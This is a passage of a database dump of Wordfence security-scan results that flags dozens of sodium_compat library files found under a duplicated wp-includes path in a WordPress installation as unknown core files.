files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34631,1631564713,1631564713,'new','knownfile',75,'652ac51b364d6cabac2e240aceba50ea','b484338942b7784e1d2eed887f3dc127','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34632,1631564713,1631564713,'new','knownfile',75,'6d5bd1790bf116123e80b953304dd48f','0031cf7490b9fc13330152bc1f44fe3c','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34633,1631564713,1631564713,'new','knownfile',75,'98008eed508913223ca3a844e5636a46','2e8702e10f2fbc61d6035d1a56fa9466','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Salsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Salsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34634,1631564714,1631564714,'new','knownfile',75,'2f6f4565c233ec04b240a65b6e333555','2982e8ff55ea87813c59c83e1165c150','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/SipHash.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/SipHash.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34635,1631564714,1631564714,'new','knownfile',75,'278d5d68a2acc2cf39f511c8cfe13f47','0f1eb6123ba7334412ebe03ac6a24093','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Util.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Util.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34636,1631564714,1631564714,'new','knownfile',75,'b8c0fa856b4de51d3f192d6893cd9d1e','4a6a8adbcac1aad4f34ac9788e9a97a8','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/X25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/X25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34637,1631564714,1631564714,'new','knownfile',75,'40b08879462383faf8bd88f0a7416155','e2b7a75a71f2fa73299e5034c83a7072','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34638,1631564714,1631564714,'new','knownfile',75,'49667306b8a79a4581aa8c513c9a7bc0','baad78c4c1c51a1cd8cd076702802632','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34639,1631564714,1631564714,'new','knownfile',75,'118245a93dcdb367b179cf77f8bb2ef6','d2c45c965bcfbe2288496dd48156428f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Crypto.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/namespaced/Crypto.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34640,1631564714,1631564714,'new','knownfile',75,'4a7b7455185d94da5938b6debe855ce8','4ddfb1ef8825a1198a5efa1ba6c18bf1','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/File.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/sodium_compat/namespaced/File.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34641,1631564714,1631564714,'new','knownfile',75,'25056205a844ea5b8c193969998870cf','31500418ddfd59bcf9c56a9ff07d1760','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/sodium_compat/src/Compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34642,1631564714,1631564714,'new','knownfile',75,'d9ba263d402bd8281782f26189f241be','5959516176a2a9877e9a63a76eb9a30f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/BLAKE2b.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core/BLAKE2b.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34643,1631564714,1631564714,'new','knownfile',75,'56cc6cc02c7e3e57f028136b77c14ec8','885b85acca28bb9f73c42e8701a26634','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Base64/Common.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/sodium_compat/src/Core/Base64/Common.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34644,1631564714,1631564714,'new','knownfile',75,'5ba40268ce12ca7dc00dd16be7da6eb0','4d0b91f94f61b77735becafa967ba975','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Base64/Original.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/src/Core/Base64/Original.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34645,1631564714,1631564714,'new','knownfile',75,'d79712436017fbbb705d5dcb49f02ab6','bd55d3b90961a8f5fffe26481fdc4653','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34646,1631564714,1631564714,'new','knownfile',75,'59f299dbebe00f224382a0d1d297c861','57ea9233a333f1aed783c046d7aad5f2','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34647,1631564715,1631564715,'new','knownfile',75,'2efa6f9ab33fb430f1750fc82ff6fab4','d20b3e6e69af7dfa6fbd3223b9e8a320','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34648,1631564715,1631564715,'new','knownfile',75,'52b1b19541e71eb9b63fcc518e7599ba','8a208c4214b80857a4165b721cd1368e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34649,1631564715,1631564715,'new','knownfile',75,'407134fea0316e6cffc531c49c671139','f5c415fbe1db6d98f8364e5e62432241','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34650,1631564715,1631564715,'new','knownfile',75,'e231d4f0f6c389122f1e9238f558b1c1','3ba2e4ebc788a91cbadd7dd673499cc2','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34651,1631564715,1631564715,'new','knownfile',75,'53c4a2383b83c565a2c454e6b5361f03','65f2001f44490ed0d1da0a0df56cf37b','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34652,1631564715,1631564715,'new','knownfile',75,'b138f065212addde9024d16a686968f0','96c1cdc6fcbe9e1270b4c4009d7e55e9','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34653,1631564715,1631564715,'new','knownfile',75,'9d4f64c54d68688814cda516834f123d','3734999e09d5daf287d1aed81f680154','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34654,1631564715,1631564715,'new','knownfile',75,'0f2acd82364ccbfc566c5bd481901604','460bb4a51c68ffc50ed0003fd986f335','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34655,1631564715,1631564715,'new','knownfile',75,'004ce424c9e3503baea3fd00e3e46cbc','0519acb3ae80b2b01b585c0962f037dc','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/H.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/H.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34656,1631564715,1631564715,'new','knownfile',75,'181495d0c7188ffcfefd0f5c792219c9','c425cb4f27ec47b978ac7ea0ad73cfd6','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/README.md','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/README.md\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34657,1631564715,1631564715,'new','knownfile',75,'7ae6562935ae3381dad8bccee5c9ba6d','785cf174b93d19cfe8d838ca6aec213e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34658,1631564715,1631564715,'new','knownfile',75,'281f1cdb9147d68a18f2a8cf90c74892','e014ac37ac0c2ef24cf163e65a71bfa7','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Ed25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core/Ed25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34659,1631564715,1631564715,'new','knownfile',75,'ac9edf7d0d07feb79add1411bf6bbfd1','9dc4ced8c4b715ea8d34b34eea64cd4a','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/HChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core/HChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34660,1631564715,1631564715,'new','knownfile',75,'367c972392fde7a15cd46ea6fccefae1','a3892f1edbfe6e0c60f59558c3a01e1f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/HSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core/HSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34661,1631564715,1631564715,'new','knownfile',75,'04112a0500c2a6afa56e247ef6f447d3','4015050b90e709518ce7f3ed322fe3ef','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Poly1305/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/Core/Poly1305/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34662,1631564715,1631564715,'new','knownfile',75,'e88755ed76d4a388b5a178b2d06089c2','1cd9b361bde83248eb8aabec5f2e1c53','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Poly1305.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core/Poly1305.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34663,1631564715,1631564715,'new','knownfile',75,'ec6cd28373e62f78e99583027cb56223','32268b7457ee23c7a70b246bdec953f4','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Salsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core/Salsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34664,1631564715,1631564715,'new','knownfile',75,'b0a2faa9637a454de62b04ef674c8458','cc43fa91254d088c97581697e4ab7a15','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/SecretStream/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core/SecretStream/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34665,1631564715,1631564715,'new','knownfile',75,'88c40fbc103c930ec00d177f1925252c','21a1e17513094ee635f46c2251a9fa3a','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/SipHash.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core/SipHash.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34666,1631564715,1631564715,'new','knownfile',75,'506bb669618039a91f34271ad5936400','21a7b8800707f39140a6dec43d233fc8','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Util.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/sodium_compat/src/Core/Util.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34667,1631564716,1631564716,'new','knownfile',75,'7d31100b69f14ba7a50051a9747f5079','272c06a7e8bf23232a83a7644d3af602','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/X25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/sodium_compat/src/Core/X25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34668,1631564716,1631564716,'new','knownfile',75,'9429230fa2bcbe013d137abe3d5b4581','e92e0aa2a10768dc69ca86c06d85be64','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/XChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 